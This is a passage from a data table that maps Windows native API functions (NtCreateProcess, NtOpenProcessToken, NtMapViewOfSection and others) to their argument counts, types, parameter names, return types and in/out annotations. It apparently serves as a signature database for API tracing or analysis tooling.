\"HANDLE\", \"POBJECT_ATTRIBUTES\"], [\"NewHiveFileName\", \"KeyHandle\", \"BackupHiveFileName\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtRestoreKey\": (3, [\"HANDLE\", \"HANDLE\", \"ULONG\"], [\"KeyHandle\", \"FileHandle\", \"RestoreOption\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSaveKey\": (2, [\"HANDLE\", \"HANDLE\"], [\"KeyHandle\", \"FileHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NTSetInformationKey\": (4, [\"HANDLE\", \"KEY_SET_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"KeyHandle\", \"InformationClass\", \"KeyInformationData\", \"DataLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetValueKey\": (6, [\"HANDLE\", \"PUNICODE_STRING\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"KeyHandle\", \"ValueName\", \"TitleIndex\", \"Type\", \"Data\", \"DataSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\"]), \"NtUnloadKey\": (1, [\"POBJECT_ATTRIBUTES\"], [\"DestinationKeyName\"], \"NTSTATUS\", [\"__IN\"]), \"RtlFormatCurrentUserKeyPath\": (1, [\"PUNICODE_STRING\"], [\"RegistryPath\"], \"NTSTATUS\", [\"__OUT\"]), \"NtCreateKeyedEvent\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"KeyedEventHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Reserved\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtReleaseKeyedEvent\": (4, [\"HANDLE\", \"PVOID\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"KeyedEventHandle\", \"Key\", \"Alertable\", \"Timeout\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtWaitForKeyedEvent\": (4, [\"HANDLE\", \"PVOID\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"KeyedEventHandle\", \"Key\", \"Alertable\", \"Timeout\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtCreateMutant\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"BOOLEAN\"], [\"MutantHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"InitialOwner\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtOpenMutant\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"MutantHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryMutant\": (5, [\"HANDLE\", \"MUTANT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"MutantHandle\", \"MutantInformationClass\", \"MutantInformation\", \"MutantInformationLength\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtReleaseMutant\": (2, [\"HANDLE\", \"PLONG\"], [\"MutantHandle\", \"PreviousCount\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NtAcceptConnectPort\": (6, [\"PHANDLE\", \"HANDLE\", \"PLPC_MESSAGE\", \"BOOLEAN\", \"PLPC_SECTION_OWNER_MEMORY\", \"PLPC_SECTION_MEMORY\"], [\"ServerPortHandle\", \"AlternativeReceivePortHandle\", \"ConnectionReply\", \"AcceptConnection\", \"ServerSharedMemory\", \"ClientSharedMemory\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_OUT_opt\", \"__OUT_opt\"]), \"NtCompleteConnectPort\": (1, [\"HANDLE\"], [\"PortHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtConnectPort\": (8, [\"PHANDLE\", \"PUNICODE_STRING\", \"PSECURITY_QUALITY_OF_SERVICE\", \"PLPC_SECTION_OWNER_MEMORY\", \"PLPC_SECTION_MEMORY\", \"PULONG\", \"PVOID\", \"PULONG\"], [\"ClientPortHandle\", \"ServerPortName\", \"SecurityQos\", \"ClientSharedMemory\", \"ServerSharedMemory\", \"MaximumMessageLength\", \"ConnectionInfo\", \"ConnectionInfoLength\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN_OUT_opt\", \"__OUT_opt\", \"__OUT_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtCreatePort\": (5, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"ULONG\", \"PULONG\"], [\"PortHandle\", \"ObjectAttributes\", \"MaxConnectInfoLength\", \"MaxDataLength\", \"Reserved\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_OUT_opt\"]), \"NtImpersonateClientOfPort\": (2, [\"HANDLE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"Request\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtListenPort\": (2, [\"HANDLE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"ConnectionRequest\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtQueryInformationPort\": (5, [\"HANDLE\", \"PORT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"PortHandle\", \"PortInformationClass\", \"PortInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtReadRequestData\": (6, [\"HANDLE\", \"PLPC_MESSAGE\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"PortHandle\", \"Request\", \"DataIndex\", \"Buffer\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtReplyPort\": (2, [\"HANDLE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"Reply\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtReplyWaitReceivePort\": (4, [\"HANDLE\", \"PHANDLE\", \"PLPC_MESSAGE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"ReceivePortHandle\", \"Reply\", \"IncomingRequest\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\", \"__IN_opt\", \"__OUT\"]), \"NtReplyWaitReplyPort\": (2, [\"HANDLE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"Reply\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\"]), \"NtRequestPort\": (2, [\"HANDLE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"Request\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtRequestWaitReplyPort\": (3, [\"HANDLE\", \"PLPC_MESSAGE\", \"PLPC_MESSAGE\"], [\"PortHandle\", \"Request\", \"IncomingReply\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\"]), \"NtWriteRequestData\": (6, [\"HANDLE\", \"PLPC_MESSAGE\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"PortHandle\", \"Request\", \"DataIndex\", \"Buffer\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\"]), \"NtCreateProcess\": (8, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"BOOLEAN\", \"HANDLE\", \"HANDLE\", \"HANDLE\"], [\"ProcessHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ParentProcess\", \"InheritObjectTable\", \"SectionHandle\", \"DebugPort\", \"ExceptionPort\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtFlushInstructionCache\": (3, [\"HANDLE\", \"PVOID\", \"ULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"NumberOfBytesToFlush\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtOpenProcess\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PCLIENT_ID\"], [\"ProcessHandle\", \"AccessMask\", \"ObjectAttributes\", \"ClientId\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtQueryInformationProcess\": (5, [\"HANDLE\", \"PROCESS_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ProcessHandle\", \"ProcessInformationClass\", \"ProcessInformation\", \"ProcessInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NTSetInformationProcess\": (4, [\"HANDLE\", \"PROCESS_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"ProcessHandle\", \"ProcessInformationClass\", \"ProcessInformation\", \"ProcessInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtTerminateProcess\": (2, [\"HANDLE\", \"NTSTATUS\"], [\"ProcessHandle\", \"ExitStatus\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\"]), \"RtlCreateUserProcess\": (10, [\"PUNICODE_STRING\", \"ULONG\", \"PRTL_USER_PROCESS_PARAMETERS\", \"PSECURITY_DESCRIPTOR\", \"PSECURITY_DESCRIPTOR\", \"HANDLE\", \"BOOLEAN\", \"HANDLE\", \"HANDLE\", \"PRTL_USER_PROCESS_INFORMATION\"], [\"ImagePath\", \"ObjectAttributes\", \"ProcessParameters\", \"ProcessSecurityDescriptor\", \"ThreadSecurityDescriptor\", \"ParentProcess\", \"InheritHandles\", \"DebugPort\", \"ExceptionPort\", \"ProcessInformation\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_OUT\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__OUT\"]), \"NtCreateProfile\": (9, [\"PHANDLE\", \"HANDLE\", \"PVOID\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\", \"KPROFILE_SOURCE\", \"KAFFINITY\"], [\"ProfileHandle\", \"Process\", \"ImageBase\", \"ImageSize\", \"BucketSize\", \"Buffer\", \"BufferSize\", \"ProfileSource\", \"Affinity\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtQueryIntervalProfile\": (2, [\"KPROFILE_SOURCE\", \"PULONG\"], [\"ProfileSource\", \"Interval\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NTSetIntervalProfile\": (2, [\"ULONG\", \"KPROFILE_SOURCE\"], [\"Interval\", \"Source\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NTStartProfile\": (1, [\"HANDLE\"], [\"ProfileHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NTStopProfile\": (1, [\"HANDLE\"], [\"ProfileHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateSection\": (7, [\"PHANDLE\", \"ULONG\", \"POBJECT_ATTRIBUTES\", \"PLARGE_INTEGER\", \"ULONG\", \"ULONG\", \"HANDLE\"], [\"SectionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"MaximumSize\", \"PageAttributess\", \"SectionAttributes\", \"FileHandle\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtExtendSection\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"SectionHandle\", \"NewSectionSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtMapViewOfSection\": (10, [\"HANDLE\", \"HANDLE\", \"PVOID\", \"ULONG\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\", \"DWORD\", \"ULONG\", \"ULONG\"], [\"SectionHandle\", \"ProcessHandle\", \"*BaseAddress\", \"ZeroBits\", \"CommitSize\", \"SectionOffset\", \"ViewSize\", \"InheritDisposition\", \"AllocationType\", \"Protect\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_OUT_opt\", \"__IN_opt\", \"__IN\", \"__IN_OUT_opt\", \"__IN_OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtOpenSection\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"SectionHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQuerySection\": (5, [\"HANDLE\", \"SECTION_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"SectionHandle\", \"InformationClass\", \"InformationBuffer\", \"InformationBufferSize\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtUnmapViewOfSection\": (2, [\"HANDLE\", \"PVOID\"], [\"ProcessHandle\", \"BaseAddress\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtCreateSemaphore\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"ULONG\"], [\"SemaphoreHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"InitialCount\", \"MaximumCount\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtOpenSemaphore\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"SemaphoreHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQuerySemaphore\": (5, [\"HANDLE\", \"SEMAPHORE_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"SemaphoreHandle\", \"SemaphoreInformationClass\", \"SemaphoreInformation\", \"SemaphoreInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtReleaseSemaphore\": (3, [\"HANDLE\", \"ULONG\", \"PULONG\"], [\"SemaphoreHandle\", \"ReleaseCount\", \"PreviousCount\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT_opt\"]), \"NtCreateSymbolicLinkObject\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PUNICODE_STRING\"], [\"pHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"DestinationName\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtOpenSymbolicLinkObject\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"pHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQuerySymbolicLinkObject\": (3, [\"HANDLE\", \"PUNICODE_STRING\", \"PULONG\"], [\"SymbolicLinkHandle\", \"pLinkName\", \"pDataWritten\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT_opt\"]), \"NtAlertResumeThread\": (2, [\"HANDLE\", \"PULONG\"], [\"ThreadHandle\", \"SuspendCount\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtContinue\": (2, [\"PCONTEXT\", \"BOOLEAN\"], [\"ThreadContext\", \"RaiseAlert\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtCreateThread\": (8, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"PCLIENT_ID\", \"PCONTEXT\", \"PINITIAL_TEB\", \"BOOLEAN\"], [\"ThreadHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ProcessHandle\", \"ClientId\", \"ThreadContext\", \"InitialTeb\", \"CreateSuspended\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCurrentTeb\": (0, [], [], \"PTEB\", []), \"NtDelayExecution\": (2, [\"BOOLEAN\", \"PLARGE_INTEGER\"], [\"Alertable\", \"DelayInterval\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtImpersonateThread\": (3, [\"HANDLE\", \"HANDLE\", \"PSECURITY_QUALITY_OF_SERVICE\"], [\"ThreadHandle\", \"ThreadToImpersonate\", \"SecurityQualityOfService\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtOpenThread\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PCLIENT_ID\"], [\"ThreadHandle\", \"AccessMask\", \"ObjectAttributes\", \"ClientId\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtQueryInformationThread\": (5, [\"HANDLE\", \"THREAD_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ThreadHandle\", \"ThreadInformationClass\", \"ThreadInformation\", \"ThreadInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtRegisterThreadTerminatePort\": (1, [\"HANDLE\"], [\"PortHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtResumeThread\": (2, [\"HANDLE\", \"PULONG\"], [\"ThreadHandle\", \"SuspendCount\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NTSetInformationThread\": (4, [\"HANDLE\", \"THREAD_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"ThreadHandle\", \"ThreadInformationClass\", \"ThreadInformation\", \"ThreadInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSuspendThread\": (2, [\"HANDLE\", \"PULONG\"], [\"ThreadHandle\", \"PreviousSuspendCount\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NtTerminateThread\": (2, [\"HANDLE\", \"NTSTATUS\"], [\"ThreadHandle\", \"ExitStatus\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtYieldExecution\": (0, [], [], \"NTSTATUS\", []), \"RtlCreateUserThread\": (10, [\"HANDLE\", \"PSECURITY_DESCRIPTOR\", \"BOOLEAN\", \"ULONG\", \"PULONG\", \"PULONG\", \"PVOID\", \"PVOID\", \"PHANDLE\", \"PCLIENT_ID\"], [\"ProcessHandle\", \"SecurityDescriptor\", \"CreateSuspended\", \"StackZeroBits\", \"StackReserved\", \"StackCommit\", \"StartAddress\", \"StartParameter\", \"ThreadHandle\", \"ClientID\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_OUT\", \"__IN_OUT\", \"__IN\", \"__IN_opt\", \"__OUT\", \"__OUT\"]), \"NtCancelTimer\": (2, [\"HANDLE\", \"PBOOLEAN\"], [\"TimerHandle\", \"CurrentState\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NtCreateTimer\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"TIMER_TYPE\"], [\"TimerHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"TimerType\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtOpenTimer\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"TimerHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryTimer\": (5, [\"HANDLE\", \"TIMER_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"TimerHandle\", \"TimerInformationClass\", \"TimerInformation\", \"TimerInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NTSetTimer\": (7, [\"HANDLE\", \"PLARGE_INTEGER\", \"PTIMER_APC_ROUTINE\", \"PVOID\", \"BOOLEAN\", \"LONG\", \"PBOOLEAN\"], [\"TimerHandle\", \"DueTime\", \"TimerApcRoutine\", \"TimerContext\", \"ResumeTimer\", \"Period\", \"PreviousState\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__OUT_opt\"]), \"NtAdjustGroupsToken\": (6, [\"HANDLE\", \"BOOLEAN\", \"PTOKEN_GROUPS\", \"ULONG\", \"PTOKEN_GROUPS\", \"PULONG\"], [\"TokenHandle\", \"ResetToDefault\", \"TokenGroups\", \"PreviousGroupsLength\", \"PreviousGroups\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\", \"__OUT_opt\"]), \"NtAdjustPrivilegesToken\": (6, [\"HANDLE\", \"BOOLEAN\", \"PTOKEN_PRIVILEGES\", \"ULONG\", \"PTOKEN_PRIVILEGES\", \"PULONG\"], [\"TokenHandle\", \"DisableAllPrivileges\", \"TokenPrivileges\", \"PreviousPrivilegesLength\", \"PreviousPrivileges\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\", \"__OUT_opt\"]), \"NtCreateToken\": (13, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"TOKEN_TYPE\", \"PLUID\", \"PLARGE_INTEGER\", \"PTOKEN_USER\", \"PTOKEN_GROUPS\", \"PTOKEN_PRIVILEGES\", \"PTOKEN_OWNER\", \"PTOKEN_PRIMARY_GROUP\", \"PTOKEN_DEFAULT_DACL\", \"PTOKEN_SOURCE\"], [\"TokenHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"TokenType\", \"AuthenticationId\", \"ExpirationTime\", \"TokenUser\", \"TokenGroups\", \"TokenPrivileges\", \"TokenOwner\", \"TokenPrimaryGroup\", \"TokenDefaultDacl\", \"TokenSource\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtDuplicateToken\": (6, [\"HANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"SECURITY_IMPERSONATION_LEVEL\", \"TOKEN_TYPE\", \"PHANDLE\"], [\"ExistingToken\", \"DesiredAccess\", \"ObjectAttributes\", \"ImpersonationLevel\", \"TokenType\", \"NewToken\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtOpenProcessToken\": (3, [\"HANDLE\", \"ACCESS_MASK\", \"PHANDLE\"], [\"ProcessHandle\", \"DesiredAccess\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\"]), \"NtOpenThreadToken\": (4, [\"HANDLE\", \"ACCESS_MASK\", \"BOOLEAN\", \"PHANDLE\"], [\"ThreadHandle\", \"DesiredAccess\", \"OpenAsSelf\", \"TokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtQueryInformationToken\": (5, [\"HANDLE\", \"TOKEN_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"TokenHandle\", \"TokenInformationClass\", \"TokenInformation\", \"TokenInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NTSetInformationToken\": (4, [\"HANDLE\", \"TOKEN_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TokenHandle\", \"TokenInformationClass\", \"TokenInformation\", \"TokenInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\"]), \"NtAccessCheckAndAuditAlarm\": (11, [\"PUNICODE_STRING\", \"HANDLE\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PSECURITY_DESCRIPTOR\", \"ACCESS_MASK\", \"PGENERIC_MAPPING\", \"BOOLEAN\", \"PULONG\", \"PULONG\", \"PBOOLEAN\"], [\"SubsystemName\", \"ObjectHandle\", \"ObjectTypeName\", \"ObjectName\", \"SecurityDescriptor\", \"DesiredAccess\", \"GenericMapping\", \"ObjectCreation\", \"GrantedAccess\", \"AccessStatus\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__OUT\", \"__OUT\"]), \"NtCloseObjectAuditAlarm\": (3, [\"PUNICODE_STRING\", \"HANDLE\", \"BOOLEAN\"], [\"SubsystemName\", \"ObjectHandle\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\"]), \"NtDeleteObjectAuditAlarm\": (3, [\"PUNICODE_STRING\", \"HANDLE\", \"BOOLEAN\"], [\"SubsystemName\", \"ObjectHandle\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\"]), \"NtOpenObjectAuditAlarm\": (12, [\"PUNICODE_STRING\", \"PHANDLE\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PSECURITY_DESCRIPTOR\", \"HANDLE\", \"ACCESS_MASK\", \"ACCESS_MASK\", \"PPRIVILEGE_SET\", \"BOOLEAN\", \"BOOLEAN\", \"PBOOLEAN\"], [\"SubsystemName\", \"ObjectHandle\", \"ObjectTypeName\", \"ObjectName\", \"SecurityDescriptor\", \"ClientToken\", \"DesiredAccess\", \"GrantedAccess\", \"Privileges\", \"ObjectCreation\", \"AccessGranted\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__OUT_opt\"]), \"NtPrivilegeObjectAuditAlarm\": (6, [\"PUNICODE_STRING\", \"HANDLE\", \"HANDLE\", \"ULONG\", \"PPRIVILEGE_SET\", \"BOOLEAN\"], [\"SubsystemName\", \"ObjectHandle\", \"ClientToken\", \"DesiredAccess\", \"ClientPrivileges\", \"AccessGranted\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtPrivilegedServiceAuditAlarm\": (5, [\"PUNICODE_STRING\", \"PUNICODE_STRING\", \"HANDLE\", \"PPRIVILEGE_SET\", \"BOOLEAN\"], [\"SubsystemName\", \"ServiceName\", \"ClientToken\", \"ClientPrivileges\", \"AccessGranted\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\"]), \"NtAccessCheck\": (8, [\"PSECURITY_DESCRIPTOR\", \"HANDLE\", \"ACCESS_MASK\", \"PGENERIC_MAPPING\", \"PPRIVILEGE_SET\", \"PULONG\", \"PACCESS_MASK\", \"PNTSTATUS\"], [\"SecurityDescriptor\", \"ClientToken\", \"DesiredAccess\", \"GenericMapping\", \"RequiredPrivilegesBuffer\", \"BufferLength\", \"GrantedAccess\", \"AccessStatus\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__OUT\", \"__IN_OUT\", \"__OUT\", \"__OUT\"]), \"NtAllocateLocallyUniqueId\": (1, [\"PLUID\"], [\"LocallyUniqueId\"], \"NTSTATUS\", [\"__OUT\"]), \"NtAllocateUuids\": (3, [\"PLARGE_INTEGER\", \"PULONG\", \"PULONG\"], [\"Time\", \"Range\", \"Sequence\"], \"NTSTATUS\", [\"__OUT\", \"__OUT\", \"__OUT\"]), \"NtPrivilegeCheck\": (3, [\"HANDLE\", \"PPRIVILEGE_SET\", \"PBOOLEAN\"], [\"TokenHandle\", \"RequiredPrivileges\", \"Result\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtQuerySystemInformation\": (4, [\"SYSTEM_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"SystemInformationClass\", \"SystemInformation\", \"SystemInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NTSetSystemInformation\": (3, [\"SYSTEM_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"SystemInformationClass\", \"SystemInformation\", \"SystemInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtGetTickCount\": (0, [], [], \"ULONG\", []), \"NtQueryPerformanceCounter\": (2, [\"PLARGE_INTEGER\", \"PLARGE_INTEGER\"], [\"PerformanceCounter\", \"PerformanceFrequency\"], \"NTSTATUS\", [\"__OUT\", \"__OUT_opt\"]), \"NtQuerySystemTime\": (1, [\"PLARGE_INTEGER\"], [\"SystemTime\"], \"NTSTATUS\", [\"__OUT\"]), 